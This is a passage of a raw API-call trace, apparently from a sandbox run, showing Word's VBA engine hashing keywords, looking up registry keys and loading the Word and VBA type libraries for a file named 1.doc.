LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#Const") returned 0x50f8c9 [0058.882] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#Else") returned 0x5050dd [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#ElseIf") returned 0x50e5b5 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#End") returned 0x50d478 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="#If") returned 0x50d383 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Base") returned 0x509fb8 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Control") returned 0x50a946 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Creatable") returned 0x501d92 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Customizable") returned 0x50c26d [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Description") returned 0x5009d0 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Exposed") returned 0x5030b3 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Ext_KEY") returned 0x50a88e [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_HelpID") returned 0x503e41 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_Func") returned 0x50c92c [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_Property") returned 0x507f4a [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_PropertyPut") returned 0x506658 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Invoke_PropertyPutRef") returned 0x505b25 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_MemberFlags") returned 0x508db7 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Name") returned 0x50e2ff [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_PredeclaredId") returned 0x505fc7 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_ProcData") returned 0x507005 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_TemplateDerived") returned 0x509f1e [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarDescription") returned 0x503303 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarHelpID") returned 0x50a3b6 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarMemberFlags") returned 0x50b6ea [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarProcData") returned 0x501b0c [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_UserMemId") returned 0x507b95 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_VarUserMemId") returned 0x504d5f [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_GlobalNameSpace") returned 0x50ce77 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName=",") returned 0x501043 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName=".") returned 0x501045 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="\"") returned 0x501039 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_") returned 0x501076 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLngPtr") returned 0x505ab0 [0058.883] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLngPtr") returned 0x5036f2 [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="PtrSafe") returned 0x506f4a [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLngLng") returned 0x504463 [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="DefLngLng") returned 0x5020a5 [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LongLong") returned 0x50378e [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="LongPtr") returned 0x50d4e8 [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0058.884] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="0") returned 0x501047 [0058.884] StringFromGUID2 (in: rguid=0x1d398603660*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb3310, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0058.884] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb2fd0 | out: phkResult=0x33e4fb2fd0*=0x11f2) returned 0x0 [0058.884] RegOpenKeyW (in: hKey=0x11f2, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x33e4fb2fc8 | out: phkResult=0x33e4fb2fc8*=0x11de) returned 0x0 [0058.884] RegEnumKeyW (in: hKey=0x11de, dwIndex=0x0, lpName=0x33e4fb2ff8, cchName=0xa | out: lpName="8.7") returned 0x0 [0058.885] wcscpy_s (in: _Destination=0x33e4fb2fe0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0058.885] RegOpenKeyW (in: hKey=0x11de, lpSubKey="8.7", phkResult=0x33e4fb3088 | out: phkResult=0x33e4fb3088*=0x120a) returned 0x0 [0058.885] _ultoa_s (in: _Val=0x409, _DstBuf=0x33e4fb3000, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0058.885] RegOpenKeyA (in: hKey=0x120a, lpSubKey="409", phkResult=0x33e4fb2ff0 | out: phkResult=0x33e4fb2ff0*=0x0) returned 0x2 [0058.885] _ultoa_s (in: _Val=0x9, _DstBuf=0x33e4fb3000, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0058.885] RegOpenKeyA (in: hKey=0x120a, lpSubKey="9", phkResult=0x33e4fb2ff0 | out: phkResult=0x33e4fb2ff0*=0x0) returned 0x2 [0058.885] RegOpenKeyA (in: hKey=0x120a, lpSubKey="0", phkResult=0x33e4fb2ff0 | out: phkResult=0x33e4fb2ff0*=0x1212) returned 0x0 [0058.885] RegOpenKeyW (in: hKey=0x1212, lpSubKey="win64", phkResult=0x33e4fb2ff8 | out: phkResult=0x33e4fb2ff8*=0x121a) returned 0x0 [0058.886] RegCloseKey (hKey=0x121a) returned 0x0 [0058.887] RegCloseKey (hKey=0x1212) returned 0x0 [0058.887] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb3090, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.887] RegOpenKeyW (in: hKey=0x120a, lpSubKey="0", phkResult=0x33e4fb3068 | out: phkResult=0x33e4fb3068*=0x120e) returned 0x0 [0058.887] RegQueryValueW (in: hKey=0x120e, lpSubKey="win64", lpData=0x33e4fb30b0, lpcbData=0x33e4fb3064 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x33e4fb3064) returned 0x0 [0058.887] wcscpy_s (in: _Destination=0x33e4fb33e0, _SizeInWords=0x800, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0058.887] RegCloseKey (hKey=0x120e) returned 0x0 [0058.887] RegCloseKey (hKey=0x120a) returned 0x0 [0058.887] RegCloseKey (hKey=0x11de) returned 0x0 [0058.887] RegCloseKey (hKey=0x11f2) returned 0x0 [0058.888] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x33e4fb2268*=0x0 | out: pptlib=0x33e4fb2268*=0x1d3985c4c00) returned 0x0 [0058.889] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb2288, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb2338 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x33e4fb2338) returned 0x0 [0058.889] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb2078 | out: ppvObject=0x33e4fb2078*=0x0) returned 0x80004002 [0058.889] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb2070, pDummy=0x33e4fb2078 | out: ppTLibAttr=0x33e4fb2070, pDummy=0x33e4fb2078*=0x0) returned 0x0 [0058.889] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb2068, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x33e4fb2068*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0058.889] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb2090, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0058.889] _ultow_s (in: _Value=0x8, _Buffer=0x33e4fb1fda, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0058.889] _ultow_s (in: _Value=0x7, _Buffer=0x33e4fb1fde, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0058.889] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb1fe2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0058.889] wcscpy_s (in: _Destination=0x1d398362fd8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0058.889] wcscpy_s (in: _Destination=0x1d398362fde, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0058.889] wcscpy_s (in: _Destination=0x1d39836302a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0058.889] wcscpy_s (in: _Destination=0x1d398363038, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0058.890] wcscpy_s (in: _Destination=0x1d3983630ae, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0058.890] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0058.890] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83adb0, cb=0x1a0) returned 0x1d39d5a0140 [0058.890] wcscpy_s (in: _Destination=0x1d39d5a0140, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0058.890] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c4c00, index=-1, refPtrFlags=0xe4fb2188, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d61c01c | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d61c01c) returned 0x0 [0058.890] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Word") returned 0x506bb5 [0058.890] strcpy_s (in: _Dst=0x33e4fb1f80, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0058.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb1f80, cbMultiByte=5, lpWideCharStr=0x33e4fb1dd0, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0058.890] wcsncpy_s (in: _Destination=0x33e4fb1d80, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0058.890] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0058.890] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x11c) returned 0x1d39d5f25d0 [0058.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x1d39d5f25d0, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0058.890] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f25d0) [0058.890] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d94f8f0, cb=0x220) returned 0x1d39d7c9cd0 [0058.890] wcscpy_s (in: _Destination=0x1d39d7c9d58, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0058.890] wcsncpy_s (in: _Destination=0x33e4fb1dc0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0058.890] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0058.890] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x11c) returned 0x1d39d5f1530 [0058.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x1d39d5f1530, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0058.890] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f1530) [0058.890] wcsncpy_s (in: _Destination=0x33e4fb1d80, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.890] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb1cb0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.890] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.890] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.890] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bccce8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb21a8 | out: ppvObject=0x33e4fb21a8*=0x0) returned 0x80004002 [0058.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x33e4fb2170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0058.891] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Word") returned 0x506bb5 [0058.891] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.891] GetModuleFileNameW (in: hModule=0x7ffce0820000, lpFilename=0x7ffce0c017e0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0058.891] QueryPathOfRegTypeLib (in: guid=0x7ffce0bd60e0*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x33e4fb2210 | out: lpbstrPathName=0x33e4fb2210) returned 0x0 [0058.893] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x33e4fb2268*=0x0 | out: pptlib=0x33e4fb2268*=0x1d3980663b0) returned 0x0 [0058.903] IUnknown:AddRef (This=0x1d3980663b0) returned 0x2 [0058.903] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb2288, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3300000000) returned 0x0 [0058.903] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb2078 | out: ppvObject=0x33e4fb2078*=0x0) returned 0x80004002 [0058.903] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2070, pDummy=0x33e4fb2078 | out: ppTLibAttr=0x33e4fb2070, pDummy=0x33e4fb2078*=0x0) returned 0x0 [0058.903] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb2068, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x33e4fb2068*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0058.903] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x33e4fb2090, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0058.903] _ultow_s (in: _Value=0x4, _Buffer=0x33e4fb1fda, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0058.903] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb1fde, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0058.903] _ultow_s (in: _Value=0x9, _Buffer=0x33e4fb1fe2, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0058.903] wcscpy_s (in: _Destination=0x1d398362fd8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0058.903] wcscpy_s (in: _Destination=0x1d398362fde, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0058.903] wcscpy_s (in: _Destination=0x1d39836302a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0058.903] wcscpy_s (in: _Destination=0x1d398363038, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0058.903] wcscpy_s (in: _Destination=0x1d3983630be, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0058.903] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0058.903] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d5a0140, cb=0x340) returned 0x1d39d9e6d80 [0058.903] wcscpy_s (in: _Destination=0x1d39d9e6ec8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0058.903] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980663b0, index=-1, refPtrFlags=0xe4fb2188, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d9e35dc | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39d9e35dc) returned 0x0 [0058.903] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VBA") returned 0x50e2f7 [0058.903] strcpy_s (in: _Dst=0x33e4fb1f80, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0058.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb1f80, cbMultiByte=4, lpWideCharStr=0x33e4fb1dd0, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0058.903] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.903] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="VBA", lHashVal=0x50e2f7, pfName=0x33e4fb1ea0, pBstrLibName=0x33e4fb1dd0 | out: pfName=0x33e4fb1ea0*=0, pBstrLibName=0x33e4fb1dd0) returned 0x0 [0058.905] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.905] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xc) returned 0x1d39d614d60 [0058.905] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982190c0) [0058.905] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982196f0 [0058.905] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d614d60) [0058.905] wcsncpy_s (in: _Destination=0x33e4fb1d80, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0058.905] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0058.905] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x122) returned 0x1d39d5f1fe0 [0058.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x1d39d5f1fe0, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0058.905] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f1fe0) [0058.905] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d7c9cd0, cb=0x440) returned 0x1d39d9e70d0 [0058.905] wcscpy_s (in: _Destination=0x1d39d9e72a8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0058.905] wcsncpy_s (in: _Destination=0x33e4fb1dc0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0058.905] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0058.905] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x122) returned 0x1d39d5f1b20 [0058.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x1d39d5f1b20, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0058.905] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5f1b20) [0058.905] wcsncpy_s (in: _Destination=0x33e4fb1d80, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", 